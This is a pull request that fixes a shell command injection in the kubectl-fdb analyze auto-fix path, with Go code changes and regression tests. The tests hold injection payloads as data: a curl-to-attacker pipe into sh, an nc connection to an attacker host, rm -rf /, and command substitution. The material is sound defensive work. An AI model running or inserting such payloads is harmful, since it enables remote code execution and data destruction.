### PR TITLE
Injection / Risky Sink — unescaped process address in fdbcli shell command | analyze

### DIFF
--- a/kubectl-fdb/cmd/analyze.go
+++ b/kubectl-fdb/cmd/analyze.go
@@ -665,8 +665,6 @@ func analyzeStatusInternal(
 			)
 		}
 
-		// fdbcli kill needs an IP. fdbserver always sets public_address to an IP (see
-		// internal/monitor_conf.go), so a non-IP here is either malformed or attacker-controlled — skip it.
 		if autoFix && process.Address.IPAddress == nil {
 			cmd.Printf(
 				"Skipping auto-fix for process %s: address %q is not a valid IP\n",

--- a/kubectl-fdb/cmd/analyze.go
+++ b/kubectl-fdb/cmd/analyze.go
@@ -21,6 +21,7 @@
 package cmd
 
 import (
+	"bytes"
 	"context"
 	"encoding/json"
 	"errors"
@@ -41,6 +42,9 @@ import (
 	"k8s.io/utils/ptr"
 	"sigs.k8s.io/controller-runtime/pkg/client"
 )
+
+// killSleepDuration is the pause between successive `fdbcli kill` invocations during --auto-fix.
+var killSleepDuration = 5 * time.Second
 
 func newAnalyzeCmd(streams genericiooptions.IOStreams) *cobra.Command {
 	o := newFDBOptions(streams)
@@ -672,19 +676,24 @@ func analyzeStatusInternal(
 		for _, process := range processesWithError {
 			cmd.Println("Start killing", process)
 			killCmd := fmt.Sprintf("kill; kill %s; sleep 5; status", process)
-			_, stderr, err := kubeHelper.ExecuteCommandOnPod(
+			var stderr bytes.Buffer
+			err := kubeHelper.ExecuteCommandRaw(
 				cmd.Context(),
 				kubeClient,
 				restConfig,
-				pod,
+				pod.Namespace,
+				pod.Name,
 				fdbv1beta2.MainContainerName,
-				fmt.Sprintf("fdbcli --exec '%s'", killCmd),
+				[]string{"fdbcli", "--exec", killCmd},
+				nil,
+				nil,
+				&stderr,
 				false,
 			)
 			if err != nil {
-				return fmt.Errorf("error killing process %s status: %s, %w", process, stderr, err)
+				return fmt.Errorf("error killing process %s status: %s, %w", process, stderr.String(), err)
 			}
-			time.Sleep(5 * time.Second)
+			time.Sleep(killSleepDuration)
 		}
 	}
 

--- a/kubectl-fdb/cmd/analyze.go
+++ b/kubectl-fdb/cmd/analyze.go
@@ -43,9 +43,6 @@ import (
 	"sigs.k8s.io/controller-runtime/pkg/client"
 )
 
-// killSleepDuration is the pause between successive `fdbcli kill` invocations during --auto-fix.
-var killSleepDuration = 5 * time.Second
-
 func newAnalyzeCmd(streams genericiooptions.IOStreams) *cobra.Command {
 	o := newFDBOptions(streams)
 
@@ -698,7 +695,7 @@ func analyzeStatusInternal(
 					err,
 				)
 			}
-			time.Sleep(killSleepDuration)
+			time.Sleep(5 * time.Second)
 		}
 	}
 

--- a/kubectl-fdb/cmd/analyze.go
+++ b/kubectl-fdb/cmd/analyze.go
@@ -691,7 +691,12 @@ func analyzeStatusInternal(
 				false,
 			)
 			if err != nil {
-				return fmt.Errorf("error killing process %s status: %s, %w", process, stderr.String(), err)
+				return fmt.Errorf(
+					"error killing process %s status: %s, %w",
+					process,
+					stderr.String(),
+					err,
+				)
 			}
 			time.Sleep(killSleepDuration)
 		}

--- a/kubectl-fdb/cmd/analyze.go
+++ b/kubectl-fdb/cmd/analyze.go
@@ -652,7 +652,6 @@ func analyzeStatusInternal(
 
 		foundIssues = true
 		addr := process.Address.StringWithoutFlags()
-		processesWithError = append(processesWithError, addr)
 		for _, message := range process.Messages {
 			printStatement(
 				cmd,
@@ -665,6 +664,18 @@ func analyzeStatusInternal(
 				errorMessage,
 			)
 		}
+
+		// fdbcli kill needs an IP. fdbserver always sets public_address to an IP (see
+		// internal/monitor_conf.go), so a non-IP here is either malformed or attacker-controlled — skip it.
+		if autoFix && process.Address.IPAddress == nil {
+			cmd.Printf(
+				"Skipping auto-fix for process %s: address %q is not a valid IP\n",
+				process.Locality[fdbv1beta2.FDBLocalityInstanceIDKey],
+				addr,
+			)
+			continue
+		}
+		processesWithError = append(processesWithError, addr)
 	}
 
 	if len(processesWithError) > 0 && autoFix {
@@ -674,6 +685,9 @@ func analyzeStatusInternal(
 			cmd.Println("Start killing", process)
 			killCmd := fmt.Sprintf("kill; kill %s; sleep 5; status", process)
 			var stderr bytes.Buffer
+			// Use ExecuteCommandRaw (argv) here instead of ExecuteCommandOnPod. The latter wraps in
+			// bash -c, and the address comes from FDB's status JSON, so a shell metacharacter in
+			// there would let an attacker inject commands.
 			err := kubeHelper.ExecuteCommandRaw(
 				cmd.Context(),
 				kubeClient,

--- a/kubectl-fdb/cmd/analyze_test.go
+++ b/kubectl-fdb/cmd/analyze_test.go
@@ -24,15 +24,20 @@ import (
 	"bytes"
 	"context"
 	"fmt"
+	"net"
+	"net/url"
 	"strings"
 	"time"
 
 	fdbv1beta2 "github.com/FoundationDB/fdb-kubernetes-operator/v2/api/v1beta2"
+	kubeHelper "github.com/FoundationDB/fdb-kubernetes-operator/v2/internal/kubernetes"
 	. "github.com/onsi/ginkgo/v2"
 	. "github.com/onsi/gomega"
 	corev1 "k8s.io/api/core/v1"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
 	"k8s.io/cli-runtime/pkg/genericiooptions"
+	"k8s.io/client-go/rest"
+	"k8s.io/client-go/tools/remotecommand"
 )
 
 func getCluster(
@@ -89,6 +94,23 @@ func getPodList(
 					DeletionTimestamp: deletionTimestamp,
 				},
 				Status: status,
+			},
+		},
+	}
+}
+
+// getStatusWithProcess builds a minimal status with one error process at the given address.
+func getStatusWithProcess(addr fdbv1beta2.ProcessAddress) *fdbv1beta2.FoundationDBStatus {
+	return &fdbv1beta2.FoundationDBStatus{
+		Cluster: fdbv1beta2.FoundationDBStatusClusterInfo{
+			Processes: map[fdbv1beta2.ProcessGroupID]fdbv1beta2.FoundationDBStatusProcessInfo{
+				"storage-1": {
+					Address:  addr,
+					Locality: map[string]string{fdbv1beta2.FDBLocalityInstanceIDKey: "storage-1"},
+					Messages: []fdbv1beta2.FoundationDBStatusProcessMessage{
+						{Name: "io_error", Type: "io_error", Time: 1},
+					},
+				},
 			},
 		},
 	}
@@ -1061,6 +1083,93 @@ var _ = Describe("[plugin] analyze cluster", func() {
 				0,
 				"top 0 fault domains:",
 			),
+		)
+	})
+
+	When("running analyzeStatusInternal with --auto-fix", func() {
+		var (
+			capturedURL *url.URL
+			origSPDY    func(*rest.Config, string, *url.URL) (remotecommand.Executor, error)
+			origSleep   time.Duration
+		)
+
+		// commandArgs returns the argv from the captured exec request.
+		commandArgs := func() []string { return capturedURL.Query()["command"] }
+
+		BeforeEach(func() {
+			origSPDY = kubeHelper.NewSPDYExecutor
+			origSleep = killSleepDuration
+			capturedURL = nil
+			kubeHelper.NewSPDYExecutor = func(_ *rest.Config, _ string, u *url.URL) (remotecommand.Executor, error) {
+				capturedURL = u
+				return &kubeHelper.FakeExecutor{}, nil
+			}
+			killSleepDuration = 0
+		})
+
+		AfterEach(func() {
+			kubeHelper.NewSPDYExecutor = origSPDY
+			killSleepDuration = origSleep
+		})
+
+		runAutoFix := func(status *fdbv1beta2.FoundationDBStatus) {
+			outBuffer := bytes.Buffer{}
+			errBuffer := bytes.Buffer{}
+			inBuffer := bytes.Buffer{}
+			cmd := newAnalyzeCmd(
+				genericiooptions.IOStreams{In: &inBuffer, Out: &outBuffer, ErrOut: &errBuffer},
+			)
+			pod := &getPodList(clusterName, namespace, corev1.PodStatus{Phase: corev1.PodRunning}, nil).Items[0]
+			// Returns a non-nil error because foundIssues=true; unrelated to the exec we inspect.
+			_ = analyzeStatusInternal(
+				cmd,
+				&rest.Config{Host: "https://fake"},
+				k8sClient,
+				status,
+				pod,
+				true,
+				clusterName,
+			)
+		}
+
+		// Regression test for the OS command injection: shell metacharacters in the address must land
+		// inside argv[2], never as a standalone argv element a shell could re-parse.
+		DescribeTable("forwards each argv element verbatim and never invokes a shell",
+			func(addr fdbv1beta2.ProcessAddress, expectedKillAddr string) {
+				runAutoFix(getStatusWithProcess(addr))
+
+				Expect(commandArgs()).To(Equal([]string{
+					"fdbcli",
+					"--exec",
+					fmt.Sprintf("kill; kill %s; sleep 5; status", expectedKillAddr),
+				}))
+				Expect(commandArgs()).NotTo(ContainElement("/bin/bash"))
+				Expect(commandArgs()).NotTo(ContainElement("/bin/sh"))
+				Expect(commandArgs()).NotTo(ContainElement("-c"))
+				Expect(commandArgs()).NotTo(ContainElement(expectedKillAddr))
+			},
+			Entry("happy path: benign IP:port",
+				fdbv1beta2.ProcessAddress{IPAddress: net.ParseIP("10.0.1.42"), Port: 4500},
+				"10.0.1.42:4500"),
+			Entry("malicious: single-quote breakout",
+				fdbv1beta2.ProcessAddress{
+					StringAddress: "evil';curl http://attacker/x|sh;echo 'pwned",
+					Port:          4500,
+				},
+				// JoinHostPort brackets the host when it contains `:` (here, from http://).
+				"[evil';curl http://attacker/x|sh;echo 'pwned]:4500"),
+			Entry("malicious: backtick command substitution",
+				fdbv1beta2.ProcessAddress{StringAddress: "host`id`", Port: 4500},
+				"host`id`:4500"),
+			Entry("malicious: dollar command substitution",
+				fdbv1beta2.ProcessAddress{StringAddress: "host$(id)", Port: 4500},
+				"host$(id):4500"),
+			Entry("malicious: semicolon chaining",
+				fdbv1beta2.ProcessAddress{StringAddress: "host; rm -rf /", Port: 4500},
+				"host; rm -rf /:4500"),
+			Entry("malicious: pipe to remote shell",
+				fdbv1beta2.ProcessAddress{StringAddress: "host|nc attacker 4444", Port: 4500},
+				"host|nc attacker 4444:4500"),
 		)
 	})
 })

--- a/kubectl-fdb/cmd/analyze_test.go
+++ b/kubectl-fdb/cmd/analyze_test.go
@@ -1128,9 +1128,8 @@ var _ = Describe("[plugin] analyze cluster", func() {
 			)
 		}
 
-		// Regression test for the OS command injection: shell metacharacters in the address must land
-		// inside argv[2], never as a standalone argv element a shell could re-parse.
-		DescribeTable("forwards each argv element verbatim and never invokes a shell",
+		// IP-addressed processes flow through to fdbcli kill as a single argv element. No shell wrapping.
+		DescribeTable("forwards valid IP processes through argv with no shell",
 			func(addr fdbv1beta2.ProcessAddress, expectedKillAddr string) {
 				runAutoFix(getStatusWithProcess(addr))
 
@@ -1142,30 +1141,27 @@ var _ = Describe("[plugin] analyze cluster", func() {
 				Expect(commandArgs()).NotTo(ContainElement("/bin/bash"))
 				Expect(commandArgs()).NotTo(ContainElement("/bin/sh"))
 				Expect(commandArgs()).NotTo(ContainElement("-c"))
-				Expect(commandArgs()).NotTo(ContainElement(expectedKillAddr))
 			},
-			Entry("happy path: benign IP:port",
+			Entry("IPv4:port",
 				fdbv1beta2.ProcessAddress{IPAddress: net.ParseIP("10.0.1.42"), Port: 4500},
 				"10.0.1.42:4500"),
-			Entry("malicious: single-quote breakout",
+		)
+
+		// Non-IP addresses get dropped before fdbcli is ever invoked. fdbserver only reports IPs in
+		// status, so anything else here is either malformed or attacker-controlled.
+		DescribeTable("skips auto-fix for processes whose address is not a valid IP",
+			func(addr fdbv1beta2.ProcessAddress) {
+				runAutoFix(getStatusWithProcess(addr))
+
+				Expect(capturedURL).To(BeNil(), "fdbcli should not have been invoked")
+			},
+			Entry("non-IP address",
+				fdbv1beta2.ProcessAddress{StringAddress: "pod-1.cluster.local", Port: 4500}),
+			Entry("malicious payload (shell metacharacters)",
 				fdbv1beta2.ProcessAddress{
 					StringAddress: "evil';curl http://attacker/x|sh;echo 'pwned",
 					Port:          4500,
-				},
-				// JoinHostPort brackets the host when it contains `:` (here, from http://).
-				"[evil';curl http://attacker/x|sh;echo 'pwned]:4500"),
-			Entry("malicious: backtick command substitution",
-				fdbv1beta2.ProcessAddress{StringAddress: "host`id`", Port: 4500},
-				"host`id`:4500"),
-			Entry("malicious: dollar command substitution",
-				fdbv1beta2.ProcessAddress{StringAddress: "host$(id)", Port: 4500},
-				"host$(id):4500"),
-			Entry("malicious: semicolon chaining",
-				fdbv1beta2.ProcessAddress{StringAddress: "host; rm -rf /", Port: 4500},
-				"host; rm -rf /:4500"),
-			Entry("malicious: pipe to remote shell",
-				fdbv1beta2.ProcessAddress{StringAddress: "host|nc attacker 4444", Port: 4500},
-				"host|nc attacker 4444:4500"),
+				}),
 		)
 	})
 })

--- a/kubectl-fdb/cmd/analyze_test.go
+++ b/kubectl-fdb/cmd/analyze_test.go
@@ -1145,6 +1145,14 @@ var _ = Describe("[plugin] analyze cluster", func() {
 			Entry("IPv4:port",
 				fdbv1beta2.ProcessAddress{IPAddress: net.ParseIP("10.0.1.42"), Port: 4500},
 				"10.0.1.42:4500"),
+			Entry(
+				"IPv6:port",
+				fdbv1beta2.ProcessAddress{
+					IPAddress: net.ParseIP("2620:149:1000:4217::1c1c"),
+					Port:      4501,
+				},
+				"[2620:149:1000:4217::1c1c]:4501",
+			),
 		)
 
 		// Non-IP addresses get dropped before fdbcli is ever invoked. fdbserver only reports IPs in

--- a/kubectl-fdb/cmd/analyze_test.go
+++ b/kubectl-fdb/cmd/analyze_test.go
@@ -1090,7 +1090,6 @@ var _ = Describe("[plugin] analyze cluster", func() {
 		var (
 			capturedURL *url.URL
 			origSPDY    func(*rest.Config, string, *url.URL) (remotecommand.Executor, error)
-			origSleep   time.Duration
 		)
 
 		// commandArgs returns the argv from the captured exec request.
@@ -1098,18 +1097,15 @@ var _ = Describe("[plugin] analyze cluster", func() {
 
 		BeforeEach(func() {
 			origSPDY = kubeHelper.NewSPDYExecutor
-			origSleep = killSleepDuration
 			capturedURL = nil
 			kubeHelper.NewSPDYExecutor = func(_ *rest.Config, _ string, u *url.URL) (remotecommand.Executor, error) {
 				capturedURL = u
 				return &kubeHelper.FakeExecutor{}, nil
 			}
-			killSleepDuration = 0
 		})
 
 		AfterEach(func() {
 			kubeHelper.NewSPDYExecutor = origSPDY
-			killSleepDuration = origSleep
 		})
 
 		runAutoFix := func(status *fdbv1beta2.FoundationDBStatus) {


### PR DESCRIPTION


# Description

An operator running `kubectl fdb analyze --analyze-status --auto-fix` executes a shell command whose argument is built from an unescaped FDB process address sourced from remote status JSON, allowing a compromised FDB process to inject arbitrary shell commands inside the target FDB pod.

## Type of change

- Bug fix (non-breaking change which fixes an issue)


## Discussion

*Are there any design details that you would like to discuss further?*
No

## Testing

Added unit tests for the same. 

## Documentation

N/A

## Follow-up

No
